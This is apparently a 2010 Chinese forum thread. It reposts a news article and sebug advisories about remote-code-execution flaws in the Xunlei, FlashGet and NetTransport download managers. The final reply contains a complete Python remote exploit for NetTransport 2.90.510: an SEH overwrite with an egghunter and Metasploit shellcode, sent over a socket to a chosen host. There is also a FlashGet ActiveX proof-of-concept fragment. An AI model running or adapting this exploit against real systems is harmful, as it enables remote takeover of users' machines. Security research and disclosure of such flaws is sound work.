三大主流下载软件安全漏洞频传

zhengrongsuiyue

根据不完全统计，全国三大主流下载软件分别是迅雷、网际快车和Net Transport，然而近期这三款软件挨个被黑客点名，都存在着严重的安全漏洞，它们在给大家带来极大方便的同时，也给全国三亿网民引入了安全风险。黑客可以简单的利用这些漏洞偷偷在网民的电脑中安装木马盗号软件，窃取网民的QQ、网游和银行卡信息，详情请听我娓娓道来。
在2010年1月2日，外国黑客Lincoln在exploit-db首发Net Transport的远程溢出漏洞，只需要攻击其NetTransport用户的31491端口，即可完全控制该电脑，幸好由于Net Transport在国内的用户不是太多，该漏洞的主要受害者还是国外网民。
在2010年1月4日，中国黑客superli也不甘示弱，在sebug发布了国内最火爆的下载软件--迅雷的致命安全漏洞，黑客可以利用迅雷的xpplayer漏洞，轻易的在安装了迅雷的网民电脑中植入后门木马，窃取QQ、网游和银行卡等信息。由于迅雷的用户主要还是国内网民，所以外国网民幸免于难。
在2010年1月6日，外国黑客对上一波迅雷的漏洞表示不大满意，中国黑客superli经过一日一夜的悬梁刺股，终于再次在exploit-db发布国际化下载软件网际快车(flashget)的IEHelp组件有一个安全漏洞，用户只要访问了黑客精心构造的页面，用户电脑控制权就完全沦陷。
新年伊始，短短的一周内，三大主流下载软件接二轮三的进入安全漏洞黑名单，实在是让人担忧。

源地址：http://www.cnbeta.com/articles/101618.htm

taoyuan237

Flashget 3.x IEHelper remote exec 0day poc
SSV ID:15199
SEBUG-Appdir:FlashGet
发布时间:2010-01-07
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
# Exploit Title:flashget 3.x IEHelper remote exec 0day poc
# Date: 2010.01.05
# Author: superli
# Version: 3.x
# Tested on: xp sp3
# Code :
<object id=TestObj classid="CLSID:{C6262DCE-6E64-45D2-B080-801F1E298AC2}" style="width:100;height:350"></object>// sebug.net [2010-01-07]

taoyuan237

迅雷5 XPPlayer Activex控件远程代码执行0day漏洞
SSV ID:15182
SEBUG-Appdir:迅雷(xunlei)
发布时间:2010-01-04
影响版本:
Xunlei5.9.14.1246以下所有版本漏洞描述:
Xunlei 是一款在线加速下载程序。更多详细信息请参考：
http://www.xunlei.com

{F3E70CEA-956E-49CC-B444-73AFE593AD7F}
Xunlei 提供的XPPlayer ActiveX控件存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题存在于DapFileSize，VodUrl等方法处理中，由于对参数缺少充分过滤，构建恶意WEB页，诱使用户访问，可导致以应用程序权限执行任意指令。

迅雷是老油条了。。
这个COM   N久之前被曝光过，现在又回来了

taoyuan237

NetTransport Download Manager version:2.90.510 0day
SSV ID:15207
发布时间:2010-01-02
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/python  
#########################  
#NetTransport Download Manager version:2.90.510 0day  
#Discovered by Lincoln  
#Tested on Windows XP SP3  
#  
#eMule file sharing protocol  
#SEH overwrite, leaves only 60 or so bytes after p/p/r  
#egghunter is used to find sc (calc.exe)  
#  
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491  
#########################  
import socket,sys  

host = sys.argv[1]  
port = int(sys.argv[2]) #eD2K port  

   
# * windows/exec - 200 bytes  
# * http://www.metasploit.com  
# * EXITFUNC=thread, CMD=calc.exe  
sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00")  


#magic packet  
buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
"\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
"\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00")  


#egg =  c00lc00l  
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")  

   
#p/p/r 10002a57 libssl.dll  
buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter  
buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000

   
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.send(buf)  
print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n"
s.close()
// sebug.net [2010-01-07]